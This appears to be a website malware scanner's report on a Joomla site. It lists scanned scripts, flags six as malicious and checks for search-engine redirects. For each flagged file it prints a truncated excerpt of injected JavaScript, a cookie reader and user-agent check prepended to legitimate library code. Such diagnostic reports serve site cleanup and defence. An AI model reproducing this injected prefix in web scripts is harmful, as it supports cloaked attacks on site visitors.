Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kozulka-grad.ru
Result: Google marks this website as suspicious: visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kozulka-grad.ru/ | 200 OK Content-Length: 80435 Content-Type: text/html | clean |
http://kozulka-grad.ru/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-1.7.2.min.js | 200 OK Content-Length: 94840 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-noconflict.js | 200 OK Content-Length: 20 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/plugins/system/cdscriptegrator/libraries/jqueryui/js/jquery-ui-1.8.20.custom.min.js | 200 OK Content-Length: 206731 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 97340 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). The visible part of the excerpt defines a cookie reader and a check of navigator.userAgent against a fixed list of strings; the same prefix appears in every file flagged as malicious on this page. Excerpt: function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… excerpt truncated by the scanner here; the text that follows appears to be the end of the original file …] return this;},remote:function(){return Swiff.remote.apply(Swiff,[this.toElement()].append(arguments));}});Swiff.CallBacks={};Swiff.remote=function(obj,fn){var rs=obj.CallFunction('<invoke name="'+fn+'" returntype="javascript">'+__flash__argumentsToXML(arguments,2)+"</invoke>"); return eval(rs);};})(); Antivirus reports: (not preserved in this copy of the page)
http://kozulka-grad.ru/media/system/js/core.js | 200 OK Content-Length: 5762 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below): function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… excerpt truncated by the scanner here; the text that follows appears to be the end of the original file …] function tableOrdering(a,b,c){var d=document.adminForm;d.filter_order.value=a;d.filter_order_Dir.value=b;submitform(c)}function saveorder(a,b){checkAll_button(a,b)}function checkAll_button(a,b){b||(b="saveorder");for(var c=0;c<=a;c++){var d=document.adminForm["cb"+c];if(d){if(!1==d.checked)d.checked=!0}else{alert("You cannot change the order of items, as an item in the list is `Checked Out`");return}}submitform(b)}; Antivirus reports: (not preserved in this copy of the page)
http://kozulka-grad.ru/media/system/js/caption.js | 200 OK Content-Length: 1707 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below): function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… excerpt truncated by the scanner here; the text that follows appears to be the end of the original file …] ""&&c.appendChild(d);c.className=this.selector.replace(".","_");c.className=c.className+" "+b;c.setAttribute("style","float:"+b);c.style.width=e+"px"}}); Antivirus reports: (not preserved in this copy of the page)
http://kozulka-grad.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 239309 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/plugins/system/jcemediabox/js/jcemediabox.js?version=1111 | 200 OK Content-Length: 57516 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/templates/vt_sport/vtemtools/menus/vtem_menu.js | 200 OK Content-Length: 10563 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/components/com_kide/js/base.js | 200 OK Content-Length: 20951 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below): function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… excerpt truncated by the scanner here; the text that follows appears to be the end of the original file …] alert(out); } } }; ajax.open('POST', kide.ajax_url+"&task=catpcha_check", true); ajax.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); ajax.send('recaptcha_challenge_field='+encodeURIComponent(kide.form('recaptcha_challenge_field'))+'&recaptcha_response_field='+encodeURIComponent(kide.form('recaptcha_response_field'))); } }; kide.events.add('onAjax_captcha_check', kide.captcha.onAjax_check); Antivirus reports: (not preserved in this copy of the page)
http://kozulka-grad.ru/components/com_kide/templates/default/js/kide.js | 200 OK Content-Length: 7280 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/modules/mod_slogin/media/slogin.js | 200 OK Content-Length: 4776 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/modules/mod_dinamods/js/dinamods.js | 200 OK Content-Length: 6021 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below): function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo [… excerpt truncated by the scanner here; the text that follows appears to be the end of the original file …] this.expandtab(this.tabs[i]); persisterror=false; } } } if (persisterror) this.expandtab(this.tabs[this.hottabspositions[0]]); if (parseInt(this.automodeperiod)>500 && this.hottabspositions.length>1){ this.autoruntimer=setInterval(function(){tabinstance.autorun()}, this.automodeperiod); } } } Antivirus reports: (not preserved in this copy of the page)
http://kozulka-grad.ru/modules/mod_joomleague_matches/assets/js/mod_joomleague_matches.js | 200 OK Content-Length: 5841 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kozulka-grad.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 09 Jan 2015 06:24:20 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ee98d926ecc6b0e698d1e3ca2331fd3f=5d23f64b3f32c65d62397ab1c1c0cf1c; path=/
Set-Cookie: kide_config=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: kozulka-grad.ru
Referer: http://www.google.com/search?q=kozulka-grad.ru
Result:
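The result is similar to the first query; no suspicious redirects were found. As shown, this check compares only the server's HTTP responses with and without a search-engine Referer; the scripts flagged as malicious above run in the visitor's browser and are not exercised by it, so a clean result here does not mean those scripts are harmless.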